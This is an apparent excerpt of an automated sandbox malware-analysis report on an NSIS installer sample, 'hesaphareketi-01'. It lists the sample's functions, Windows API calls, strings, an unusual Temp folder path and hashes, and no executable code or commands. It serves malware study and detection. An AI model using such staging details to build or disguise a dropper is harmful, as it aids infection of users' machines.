                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$Enum
                                                                                      • String ID:
                                                                                      • API String ID: 464197530-0
                                                                                      • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                      • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                                                      • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                                      • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405C0C
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically,?,00000000,000000F0), ref: 0040164D
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically, xrefs: 00401640
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Undige\Chowderheaded\ukyndighed\Asymmetrically
                                                                                      • API String ID: 1892508949-481820323
                                                                                      • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                      • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                                                      • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                      • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405C5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,Cellulipetally Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405C0C
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                        • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                      • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420,00000000), ref: 00405CB4
                                                                                      • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420), ref: 00405CC4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\
                                                                                      • API String ID: 3248276644-3404278061
                                                                                      • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                      • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                                                      • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                      • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                                                      • RegCloseKey.KERNELBASE(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsj313A.tmp\System.dll), ref: 004061A1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3356406503-1824292864
                                                                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                      • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                      • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040587A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                      • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                                                      • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                      • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 56libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$FreeHandleLoadModule
                                                                                      • String ID:
                                                                                      • API String ID: 2140536961-0
                                                                                      • Opcode ID: 6e6e7f0f1b6bfd2255ba36ef30769f868f8b0a3d5eacdc143ac1427d18367fdb
                                                                                      • Instruction ID: 59c796add972d153f89f3c9847da26c086efaaa3f0626d733024812317f43a11
                                                                                      • Opcode Fuzzy Hash: 6e6e7f0f1b6bfd2255ba36ef30769f868f8b0a3d5eacdc143ac1427d18367fdb
                                                                                      • Instruction Fuzzy Hash: 51114271900209ABDF21AF65CE4C59EBAB0BF04344F54853BF501F62E1DBB98D81DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402253 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 004065C5: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,75383420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75383420), ref: 004065D0
                                                                                        • Part of subcall function 004065C5: FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                      • lstrlenW.KERNEL32 ref: 00402293
                                                                                      • lstrlenW.KERNEL32(00000000), ref: 0040229E
                                                                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: 873f757547937f42a6eb71912f4c96e239b987a47b92837fe142eeb779086f02
                                                                                      • Instruction ID: 7b2fc1264b4fb0dc72f9b007f51c651f6a3d170a065e006ef865ab6f7e8bf7d8
                                                                                      • Opcode Fuzzy Hash: 873f757547937f42a6eb71912f4c96e239b987a47b92837fe142eeb779086f02
                                                                                      • Instruction Fuzzy Hash: D6117C71904308AADB10EFF99E49A9EB7B8AF14354F10457FA405FB2D1E6BCD8408B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                                                      • GetLastError.KERNEL32 ref: 10002A62
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1296135375.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1296082839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296189107.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1296242418.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 1214770103-0
                                                                                      • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                      • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                      • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                      • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsj313A.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                      • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                                                      • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                      • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                      • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                      • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                      • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_hesaphareketi-01.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteValue
                                                                                      • String ID:
                                                                                      • API String ID: 2831762973-0
                                                                                      • Opcode ID: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                      • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                                                      • Opcode Fuzzy Hash: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                      • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1272412908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1272365799.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272459902.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272504866.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1272846200.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
